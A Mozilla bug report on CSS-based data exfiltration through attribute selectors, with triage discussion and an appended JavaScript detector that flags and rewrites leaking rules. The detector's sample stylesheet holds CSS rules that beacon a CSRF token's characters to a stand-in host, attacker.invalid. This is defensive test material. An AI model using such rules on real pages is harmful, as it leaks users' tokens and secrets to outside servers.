Open Bug 1531601 Opened 5 years ago Updated 10 months ago

css exfil protection (protection against attribute selectors extracting data from HTML attributes)

Categories

(Core :: CSS Parsing and Computation, defect, P3)

defect

Tracking


UNCONFIRMED

People

(Reporter: jrdn.wms, Unassigned)

Details

User Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0

Steps to reproduce:

Visit this CSS Exfil Vulnerability Tester:
https://www.mike-gualtieri.com/css-exfil-vulnerability-tester

Actual results:

See faces

Expected results:

I would get green checkmarks

Further information:
https://www.mike-gualtieri.com/posts/stealing-data-with-css-attack-and-defense
https://addons.mozilla.org/en-US/firefox/addon/css-exfil-protection/
https://github.com/mlgualtieri/CSS-Exfil-Protection

I couldn't find a bug report for this topic so I figured I'd put one in on it

Group: firefox-core-security → layout-core-security
Component: Untriaged → CSS Parsing and Computation
Product: Firefox → Core
Version: 60 Branch → unspecified

I'm going to unhide this because it is based on a year-old blog post.

David, any thoughts?

Group: layout-core-security
Flags: needinfo?(dbaron)
Whiteboard: [layout:triage-discuss]

FWIW Xidorn raised this in the CSSWG last year, but he came to the conclusion that it's an issue for framework developers rather than browsers and their selector matching: https://github.com/w3c/csswg-drafts/issues/2339

Priority: -- → P3

I'd note that I think the blog post rather overstates the severity of these attacks because form controls don't (in the platform) reflect user input into the value attribute. Instead, the defaultValue DOM property reflects the HTML value attribute, and the value DOM property contains the user input.

However, some frameworks (e.g., React) may change this model.

So I think this is a problem that applies to pages that use certain frameworks but not pages in general.

I suppose the suggested fix here is to break cross-domain image loading when it's triggered from an attribute selector. It's not clear to me what the tradeoff is between (a) sites that would be broken and (b) developers that would be confused against any security benefits to sites that use such frameworks and would hit this issue.

Flags: needinfo?(dbaron)
Summary: css exfil protection → css exfil protection (protection against attribute selectors extracting data from HTML attributes)
Whiteboard: [layout:triage-discuss]
Severity: normal → S3
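As an added example (not code from this bug, from Firefox, or from the add-on linked above), here is the rule-level check such a defence reduces to: flag stylesheet rules that pair an attribute selector with a cross-origin url() load, and rewrite them so the fetch is dropped. The sample stylesheet, the page origin example.test and the attacker.invalid domain are constructed for the demonstration.

```javascript
// Added example, not from the bug, Firefox or the CSS-Exfil-Protection add-on.
// Finds CSS rules combining an attribute selector with a cross-origin url() load,
// the pattern that can leak attribute values one character at a time, and rewrites
// them to url-less rules. As dbaron notes above, this matters only for pages whose
// framework reflects user input into the attribute; plain form controls keep the
// typed text in the DOM `value` property, which attribute selectors never see.

const COMMENT_RE = /\/\*[\s\S]*?\*\//g;
const RULE_RE = /([^{}]+)\{([^{}]*)\}/g;
const ATTR_RE = /\[\s*([a-zA-Z_-][\w-]*)\s*(?:[\^$*|~]?=\s*(?:"[^"]*"|'[^']*'|[^\]\s]+))?\s*[iIsS]?\s*\]/g;
const URL_RE = /url\(\s*(['"]?)([^'")]+)\1\s*\)/;

// Returns the foreign origin a url() would contact, or null when it is same-origin
// or not a network fetch at all (data:, blob:, unparsable).
function crossOriginTarget(rawUrl, pageUrl) {
  let u;
  try { u = new URL(rawUrl, pageUrl); } catch { return null; }
  if (u.protocol !== "http:" && u.protocol !== "https:") return null;
  return u.origin === new URL(pageUrl).origin ? null : u.origin;
}

function findExfilRules(cssText, pageUrl) {
  const findings = [];
  for (const m of cssText.replace(COMMENT_RE, "").matchAll(RULE_RE)) {
    const selector = m[1].trim();
    const attributes = [...selector.matchAll(ATTR_RE)].map(a => a[1]);
    const url = URL_RE.exec(m[2]);
    if (attributes.length === 0 || !url) continue;
    const target = crossOriginTarget(url[2], pageUrl);
    if (target) findings.push({ selector, attributes, target });
  }
  return findings;
}

// Keep each flagged rule but replace its url() with `none`, so styling survives
// while the per-character beacon does not.
function neutralise(cssText, pageUrl) {
  return cssText.replace(COMMENT_RE, "").replace(RULE_RE, (rule, sel, body) => {
    const url = URL_RE.exec(body);
    if (!url || !sel.match(ATTR_RE) || !crossOriginTarget(url[2], pageUrl)) return rule;
    return rule.replace(url[0], "none");
  });
}

// Constructed sample: two leaking rules, one same-origin rule, one rule without
// an attribute selector. Only the first two should be reported.
const SAMPLE_CSS = `
  input[name="csrf"][value^="a"] { background: url(https://attacker.invalid/a); }
  input[name="csrf"][value^="b"] { background-image: url("https://attacker.invalid/b"); }
  a[href$=".pdf"] { background: url(/icons/pdf.png); }      /* same-origin icon */
  .logo { background: url(https://cdn.example.test/logo.png); } /* no attribute selector */
`;
```

Running `findExfilRules(SAMPLE_CSS, "https://example.test/")` reports the two attacker.invalid rules; `neutralise` leaves the other two rules byte-for-byte intact.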